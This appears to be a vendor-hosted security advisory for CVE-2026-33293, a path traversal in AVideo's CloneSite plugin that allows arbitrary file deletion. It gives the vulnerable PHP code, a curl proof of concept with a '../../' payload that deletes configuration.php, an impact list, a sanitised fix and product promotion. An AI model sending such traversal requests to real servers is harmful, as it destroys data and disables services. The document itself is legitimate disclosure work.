CVE-2026-33293

CVE-2026-33293 is a high-severity path traversal vulnerability in wwbn/avideo (composer), affecting versions <= 25.0. No fixed version is listed yet.

Summary

The deleteDump parameter in plugin/CloneSite/cloneServer.json.php is passed directly to unlink() without any path sanitization. An attacker with valid clone credentials can use path traversal sequences (e.g., ../../) to delete arbitrary files on the server, including critical application files such as configuration.php, causing complete denial of service or enabling further attacks by removing security-critical files.

Details

In plugin/CloneSite/cloneServer.json.php, the $clonesDir variable is set to the application's storage path appended with clones/ (line 11). When a deleteDump GET parameter is provided, its value is concatenated directly into a path passed to unlink() with no validation:

// plugin/CloneSite/cloneServer.json.php:10-11
$videosDir = Video::getStoragePath() . "";
$clonesDir = "{$videosDir}clones/";
// plugin/CloneSite/cloneServer.json.php:44-46
if (!empty($_GET['deleteDump'])) {
    $resp->error = !unlink("{$clonesDir}{$_GET['deleteDump']}");
    $resp->msg = "Delete Dump {$_GET['deleteDump']}";
    die(json_encode($resp));
}

The intended functionality is to delete SQL dump files generated during the clone process (named via uniqid() at line 58). However, because $_GET['deleteDump'] is never passed through basename(), realpath(), or any other path normalization function, an attacker can supply directory traversal sequences to escape the $clonesDir directory.

Given a typical $clonesDir of /var/www/html/videos/clones/, the payload ../../videos/configuration.php resolves to /var/www/html/videos/configuration.php.

The authentication guard thisURLCanCloneMe() at line 38 requires a valid URL and matching key for an admin-approved clone entry (status === 'a'). This is a service-level credential, not an admin session, any approved clone partner possesses these credentials as part of normal operations.

The legitimate clone client at cloneClient.json.php:275 only sends server-generated $json->sqlFile values (produced by uniqid()), but nothing prevents a holder of valid credentials from crafting a manual HTTP request with an arbitrary deleteDump value.

PoC

Prerequisites: A valid clone URL and key pair registered and approved by an admin.

Step 1: Verify the target file exists (e.g., the application configuration file).

curl -s "https://avideo.local/videos/configuration.php" -o /dev/null -w "%{http_code}"
# Expected: 200 (or 302/403, file exists and is served/protected)

Step 2: Send the path traversal payload via the deleteDump parameter.

curl -s "https://avideo.local/plugin/CloneSite/cloneServer.json.php?url=https://approved-clone.local&key=VALID_CLONE_KEY&deleteDump=../../videos/configuration.php"

Expected response:

{"error":false,"msg":"Delete Dump ..\/..\/videos\/configuration.php","url":"https:\/\/approved-clone.local","key":"VALID_CLONE_KEY","useRsync":0,"videosDir":"\/var\/www\/html\/videos\/","sqlFile":"","videoFiles":[],"photoFiles":[]}

"error":false confirms unlink() returned true, the file was successfully deleted.

Step 3: Confirm deletion.

curl -s "https://avideo.local/videos/configuration.php" -o /dev/null -w "%{http_code}"
# Expected: 404 or 500, file no longer exists

Step 4: At this point the entire AVideo application is broken, as configuration.php contains database credentials and is require_once'd by nearly every endpoint.

Impact

  • Arbitrary file deletion: An attacker can delete any file readable by the web server process, including application source code, configuration files, uploaded media, and database dumps containing credentials.
  • Complete denial of service: Deleting configuration.php renders the entire AVideo installation non-functional. Every page load will fatal-error on the missing require_once.
  • Security control bypass: Deleting .htaccess files or other access-control configurations can expose otherwise-protected directories and files.
  • Data loss: Uploaded videos, user photos, and SQL backups stored under the videos directory can be permanently destroyed.
  • Potential escalation: Deleting specific files (e.g., plugin configurations, auth modules) may weaken the application's security posture and enable further attacks.

Input manipulates file paths to reach files outside the intended directory, such as configuration or credential files. Typical impact: unauthorized file read or write outside the intended directory.

CVE-2026-33293 has a CVSS score of 8.1 (High). The vector is network-reachable, low privileges required, and no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. No fixed version is listed yet, so configuration controls and monitoring matter more in the interim.

Affected versions

wwbn/avideo (<= 25.0)

Security releases

Not available

Kodem intelligence

Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.

Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.

See it in your environment

Remediation advice

Apply basename() to the deleteDump parameter to strip any directory traversal components, ensuring the deletion is restricted to files within $clonesDir:

// plugin/CloneSite/cloneServer.json.php:44-48
if (!empty($_GET['deleteDump'])) {
    $deleteDump = basename($_GET['deleteDump']);
    $filePath = "{$clonesDir}{$deleteDump}";
    if (strpos(realpath($filePath), realpath($clonesDir)) !== 0) {
        $resp->msg = "Invalid file path";
        die(json_encode($resp));
    }
    $resp->error = !unlink($filePath);
    $resp->msg = "Delete Dump {$deleteDump}";
    die(json_encode($resp));
}

The fix applies defense-in-depth: basename() strips path components, and the realpath() check ensures the resolved path is still within the intended directory even if basename() behavior changes across PHP versions.

Frequently Asked Questions

  1. What is CVE-2026-33293? CVE-2026-33293 is a high-severity path traversal vulnerability in wwbn/avideo (composer), affecting versions <= 25.0. No fixed version is listed yet. Input manipulates file paths to reach files outside the intended directory, such as configuration or credential files.
  2. How severe is CVE-2026-33293? CVE-2026-33293 has a CVSS score of 8.1 (High). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
  3. Which versions of wwbn/avideo are affected by CVE-2026-33293? wwbn/avideo (composer) versions <= 25.0 is affected.
  4. Is there a fix for CVE-2026-33293? No fixed version is listed for CVE-2026-33293 yet. Monitor the advisory for updates and apply mitigations in the interim.
  5. Is CVE-2026-33293 exploitable, and should I be worried? Whether CVE-2026-33293 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
  6. What actually determines whether CVE-2026-33293 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
  7. How do I fix CVE-2026-33293? No fixed version is listed yet. In the interim: Resolve the canonical path after applying any user-supplied input, and verify it remains within the intended directory before accessing it.

Other vulnerabilities in wwbn/avideo

CVE-2026-33731CVE-2026-33692CVE-2026-33684CVE-2026-54458CVE-2026-50183

Stop the waste.
Protect your environment with Kodem.